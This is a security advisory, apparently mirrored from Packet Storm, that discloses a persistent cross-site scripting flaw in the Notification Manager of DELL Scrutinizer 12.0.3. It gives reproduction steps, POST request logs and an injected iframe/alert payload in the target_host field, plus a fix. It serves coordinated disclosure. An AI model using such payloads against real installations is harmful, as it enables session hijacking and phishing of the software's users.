what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DELL Scrutinizer 12.0.3 Cross Site Scripting

DELL Scrutinizer 12.0.3 Cross Site Scripting
Posted Dec 22, 2015
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

DELL Scrutinizer version 12.0.3 suffers from a persistent script insertion vulnerability.

tags | exploit
SHA-256 | 90ecd7a57fd5dd1c8a16a15c21ddf77a0a61b4c26758289c9db26bda4b158d93

DELL Scrutinizer 12.0.3 Cross Site Scripting

Change Mirror Download
Document Title:
===============
DELL Scrutinizer v12.0.3 - Persistent Software Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1360

Tracking ID: 15943


Release Date:
=============
2015-12-18


Vulnerability Laboratory ID (VL-ID):
====================================
1360


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
Scrutinizer™ is at the foundation of the Plixer incident response and behavior analysis architecture. It is available as a
physical or virtual appliance, or as a windows download. Scrutinizer performs the collection, threat detection, and reporting
of all flow technologies on a single platform. It delivers real-time situational awareness into the applications and their
historical behaviors on the network. Massive scalability, supporting dozens of distributed collectors, Capable of archiving and
analyzing several million flows per second, Topology mapping with active links and Deduplication and stitching across collectors.

Dell SonicWALL Scrutinizer enables organizations to achieve uniquely granular, flexible and powerful insight into network
and application traffic, and it’s compatible with Dell SonicWALL Next-Generation Firewall and third party product exports
of IPFIX data. Scrutinizer is also useful for reducing troubleshooting time for network performance issues. In addition,
Scrutinizer users, especially service providers, can take advantage of Scrutinizer to proactively monitor Quality of
Service (QoS) and generate invoicing data and Service Level Agreement (SLA) metrics reports.

(Copy of the MVendor Homepage: http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html )
(Copy of the Product Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer-Netflow-Analyzer.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official DELL Scrutinizer v12.0.3 Software.


Vulnerability Disclosure Timeline:
==================================
2014-11-24: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
2014-12-16: Vendor Notification (DELL Security Team - Scrutinizer)
2015-12-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DELL
Product: Scrutinizer - Appliance Software 12.0.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official DELL Scrutinizer v12.0.3 Software.
The vulnerability allows privileged user accounts and restricted user accounts to inject own malicious script codes to
the application-side of scrutinizer software.

The vulnerability is located in the `target_host` (hostname) input field of the `Admins > Definitions > Notification Manager` module.
Attackers are able to inject own script codes by manipulation of the POST method request in the `notification manager`. The attack
vector of the bug is persistent on the application-side and the request method to inject is POST. The vulnerability is a classic
input validation POST inject vulnerability. Attackers are also able to force a client-side execution by manipulation of special
crafted webpage links.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring
system) count of 3.5. Exploitation of the application-side web vulnerability requires a low privileged web-application user
account and low or medium user interaction. Successful exploitation of the vulnerability results in persistent phishing mails,
session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected
software module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Definitions > Notification Manager

Vulnerable Parameter(s):
[+] target_host (hostname - profilname)

Affected Module(s):
[+] Definitions > Notification Manager > Profile Name (Input) (notify.cgi) (http://localhost:8080/)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local restricted user account with access privileges and with low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the scrutinizer application
2. Start the service and login to the service
3. Click the admin navigation button and switch to the definitions section were the notification manager module is located
4. Include any random input to the profile name input
Note: Now, the service redirect to the edit mask profile
5. Include in the Host name input field your own script code payload and save via POST method request
6. The code execution occurs in the edit form of the definitions > notification manager module
7. Successful reproduce of the vulnerability in the notify.cgi!


PoC: Admins > Definitions > Notification Manager > Profile Name (Input) (notify.cgi)

<tbody><tr><th colspan="2">New Alert Setup
</th></tr><tr><td class=""> Profile Name</td>
<td class=""> test23
<input name="profile_name" id="profile_name" value="test23" type="hidden">
<input name="calling_program" value="logalot" type="hidden">
<input name="add_alert" id="add_alert" value="Syslog" type="hidden">
<input name="edit_alert_id" value="" type="hidden">
<input id="group_id" name="group_id" value="" type="hidden">
<input name="edit_profile" value="0" type="hidden"></td></tr>
<tr><td class="">Host</td><td class=""><input name="target_host" value="" type="TEXT"><[PERSISTENT INJECTED SCRIPT CODE!])" <"="">
<tr><td >UDP Port<TD><INPUT TYPE=TEXT NAME=syslog_port VALUE="514" size=3>
<tr><td >Priority
<TD><SELECT NAME=priority_code>
<OPTION SELECTED>alert
<option>alert
<option>crit
<option>debug
<option>emerg
<option>err
<option>info
<option>notice
<option>warning


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/cgi-bin/notify.cgi
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[1152] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer
[http://localhost:8080/]
Content-Length[156]
Cookie[cookiesenabled=1; userid=1; sessionid=nZHoS6vgaff7txmR; seenEvalModal=1; seenSkinModal=1]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
edit_profile[0]
profile_name[%22"><[PERSISTENT INJECTED SCRIPT CODE!]+%3C]
add_alert[Syslog]
group_id[]
old_profile_name[]
action[AddAlert]
user_id[1]
Response Header:
Date[Mon, 24 Nov 2014 20:57:41 GMT]
Server[Apache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1152]
Keep-Alive[timeout=67, max=23]
Connection[Keep-Alive]
Content-Type[text/html]
-
Status: 200[OK]
POST http://localhost:8080/cgi-bin/notify.cgi
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[1247] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer
[http://localhost:8080/]
Content-Length[341]
Cookie[cookiesenabled=1; userid=1; sessionid=nZHoS6vgaff7txmR; seenEvalModal=1; seenSkinModal=1]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
profile_name[asdsad]
calling_program[logalot]
add_alert[Syslog]
edit_alert_id[]
group_id[]
edit_profile[0]
target_host[%22[PERSISTENT INJECTED SCRIPT CODE!])+%3C+%22%3E%3Ciframe+src%3Da+onload%3Dalert(%22PENTEST%22)+%3C]
syslog_port[514]
priority_code[alert]
facility_code[auth]
message[%25m]
minutes_trigger[0]
action[TestAlert]
user_id[1]
Response Header:
Date[Mon, 24 Nov 2014 21:00:33 GMT]
Server[Apache]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1247]
Keep-Alive[timeout=67, max=79]
Connection[Keep-Alive]
Content-Type[text/html]


Reference(s):
http://localhost:8080/cgi-bin/notify.cgi

http://localhost:8080/#tab=tab6&rpt_json={%22reportTypeLang%22%3A%22flowCountByDestination%22%2C%22devicename%22%3A%22Scrutinizer%22%2C%22
deviceip%22%3A%22localhost:8080%22%2C%22reportDirections%22%3A{%22selected%22%3A%22inbound%22}%2C%22times%22%3A{%22dateRange%22%3A%22
LastHour%22%2C%22start%22%3A%22%22%2C%22end%22%3A%22%22}%2C%22filters%22%3A{%22sdfDips_0%22%3A%22in_7F000001_ALL%22}%2C%22
dataGranularity%22%3A{%22selected%22%3A%22auto%22}}&subCat=LogalotPrefs

http://localhost:8080/#tab=tab6&rpt_json={%22reportTypeLang%22%3A%22flowCountByDestination%22%2C%22devicename%22%3A%22Scrutinizer%22%2C%22
deviceip%22%3A%22localhost:8080%22%2C%22reportDirections%22%3A{%22selected%22%3A%22inbound%22}%2C%22times%22%3A{%22dateRange%22%3A%22
LastHour%22%2C%22start%22%3A%22%22%2C%22end%22%3A%22%22}%2C%22filters%22%3A{%22sdfDips_0%22%3A%22in_7F000001_ALL%22}%2C%22
dataGranularity%22%3A{%22selected%22%3A%22auto%22}}&subCat=DataHistory


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the target_host input field.
Restrict the input field and encode the output of the dbms stored values to prevent persistent script code executions.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the target_host is estimated as medium (CVSS 3.5).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close